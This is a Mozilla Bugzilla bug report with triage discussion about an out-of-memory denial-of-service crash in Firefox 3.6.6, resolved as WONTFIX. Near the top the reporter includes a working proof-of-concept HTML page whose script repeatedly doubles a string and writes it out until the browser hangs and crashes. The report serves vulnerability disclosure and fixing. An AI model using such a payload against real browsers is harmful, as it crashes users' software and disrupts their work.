Closed Bug 575263 Opened 14 years ago Closed 6 years ago

Denial of Service in Firefox 3.6.6 - oom [@ _CxxThrowException | operator new | TextRunWordCache::MakeTextRun]

Categories

(Core :: Layout: Text and Fonts, defect)

Product:
Core
Component:
Layout: Text and Fonts
Version:
1.9.2 Branch
Type:
defect
Priority:
Not set
Severity:
major

Tracking

()

Status:
RESOLVED WONTFIX
Tracking Flags:
Tracking Status
status2.0 --- unaffected
status1.9.2 --- wanted

People

(Reporter: r45c4l, Unassigned)

References

Details

(Keywords: crash, Whiteboard: [sg:dos OOM] maybe fixed by 565373)

Crash Data

Attachments

(1 file)

WinDbg Stacktrace
68.51 KB, text/plain
Details 
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6

[ EXPL0!T ]
<html><title>Mozilla Firefox 3.6.6 Denial of Service by r45c4l </title>
<script>
function junk()
{
var buff="A";
for (i=0;i<786;i++)
{
buff+=buff+"A";
document.write(buff+buff);
}
}
</script>
<body onload="javascript:junk();">
<font color=green>r45c4l<font color="red">[AT]</font>hotmail<font color="green">[DOT]</font>com</font>
</body>
</html>  


Save the page as [dot]html, open it with Firefox 3.6.6. The browser will get hanged and then crash.


Reproducible: Always

Actual Results:  
Browser gets hanged and crash
No crash on - Mozilla/5.0 (Windows; U; Windows NT 6.1; WOW64; en-US; rv:1.9.3a6pre) Gecko/20100628 Minefield/3.7a6pre

Crash - Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Severity: normal → major
Attached file WinDbg Stacktrace 

    
  
blocking1.9.2: --- → ?

    
    

    
  
Crashes Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 as well
OS: Windows 7 → All
Hardware: x86 → All

    
  

        Attachment #454514 -
        Attachment mime type: application/octet-stream → text/plain

    
    

    
  
_CxxThrowException
operator new(unsigned int size = 0x692a2c0c)
TextRunWordCache::MakeTextRun(0x00000003, aLength = 0xfffffc6, 0x0a6d4240, 0x0036b548, 0x1000120)+0x91 [e:\builds\moz2_slave\win32_build\build\gfx\thebes\src\gfxtextrunwordcache.cpp @ 707]
MakeTextRun(0x693039ec, 0x36da30, aFontGroup = 0x00000003, 0x0a6dc720, 0)
BuildTextRunsScanner::BuildTextRunForFrames
BuildTextRunsScanner::FlushFrames
BuildTextRuns
_cairo_array_grow_by
USP10!ApplyFeatures+0x645
gfxTextRun::Draw
nsHTMLReflowState::InitConstraints
nsContainerFrame::ReflowChild
CanvasFrame::Reflow
nsContainerFrame::ReflowChild
nsHTMLScrollFrame::ReflowScrolledFrame
nsHTMLScrollFrame::ReflowContents
nsHTMLScrollFrame::Reflow
nsContainerFrame::ReflowChild
ViewportFrame::Reflow
Component: General → Layout: Text
Keywords: crash
Product: Firefox → Core
QA Contact: general → layout.fonts-and-text
Summary: Denial of Service in Firefox 3.6.6 → Denial of Service in Firefox 3.6.6 - oom [@ _CxxThrowException | operator new | TextRunWordCache::MakeTextRun]
Version: unspecified → 1.9.2 Branch

    
    

    
  
Did a regression range on this issue Tracemonkey build from May 17th shows the issue, May 18th no longer crashes or hangs. Mozilla Central build from the 18th hangs meaning that this was fixed on Tracemonkey first.

http://hg.mozilla.org/tracemonkey/pushloghtml?fromchange=e5ae28ee811b&tochange=955bfaadaebb

This has two bugs
bug 565229 - Bulk clear GC bitmaps when GC starts instead of after the GC ends 
bug 565373 - Fix recursing with inlining 

I suspect the second is the bug that fixed the issue.
Status: UNCONFIRMED → NEW
Ever confirmed: true
blocking1.9.2: ? → .8+

          status1.9.2:
          --- → wanted
Depends on: 565373
Whiteboard: [sg:dos OOM] fixed by 565373
No longer depends on: 565373
Depends on: 565373

    
    

    
  
I'm not sure 565373 is the fix since that appeared to be fixing a trunk regression after 3.6 branched. But we can try the patch, maybe the regression range is incorrect.
Whiteboard: [sg:dos OOM] fixed by 565373 → [sg:dos OOM] maybe fixed by 565373

    
  
Assignee: nobody → sayrer

    
    

    
  
sayrer, can you see if the fix for bug 565373 fixes this on a branch? I'll try to check it locally as well, but you'd need to be involved anyway to land if it does fix it.

    
    

    
  
(In reply to comment #7)
> sayrer, can you see if the fix for bug 565373 fixes this on a branch? I'll try
> to check it locally as well, but you'd need to be involved anyway to land if it
> does fix it.

Is this comment in the right bug?

    
    

    
  
Yes. This bug is not an issue on trunk as it was fixed in TM which later merged into m-c, and the fix range points to bug 565373 (see comment 5). We'd like bug 565373 backported to the branches if it a) actually fixes this bug's issue and b) is fairly safe.

I'm looking to patch 1.9.2.9 default now with the fix from bug 565373 and test it locally, to make sure the page in comment 1 doesn't cause a crash anymore. I wouldn't be the guy to integrate or determine if we should actually take that on the branch(es) though, which is why I looped you in. If this should go to someone else, let me know.

          status2.0:
          --- → unaffected

    
    

    
  
...and I just realized we are already tracking bug 565373, so this should probably be closed in favor of doing everything in bug 565373 (once it is determined that this is indeed a dupe of bug 565373).

    
  
Assignee: sayrer → abillings

    
    

    
  
Al, I may not have time to get to this. If you have time, can you do a local build with the fix from bug 565373 to see if this should be duped off?

Thanks!

    
    

    
  
My HG-fu is weak. While I build debug builds, in general, for testing, I don't know enough HG to know how to pull the patch from bug 565373 and merge it into my local repro. If someone wants to give me simple instructions on how to do it, I can build an optimized build on Windows for this.

    
    

    
  
Hmmm, doesn't look like there is a js/src/jsrecursion.cpp in 1.9.2...

    
  
blocking1.9.2: .9+ → ---

    
  
Assignee: abillings → nobody

    
    

    
  
Didn't we add a limit on JS string length? Was that on trunk or in 1.9.2 already?
Crash Signature: [@ _CxxThrowException | operator new | TextRunWordCache::MakeTextRun]

    
    

    
  
Closing because no crash reported since 12 weeks.
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → WONTFIX

          You need to log in
          before you can comment on or make changes to this bug.
        






  

    
  







  

    

      
Attachment

      

      
      
      
      
    

    

      

        

          

            
General

            

              Creator: 



            

            
Created: 

            
Updated: 

            
Size: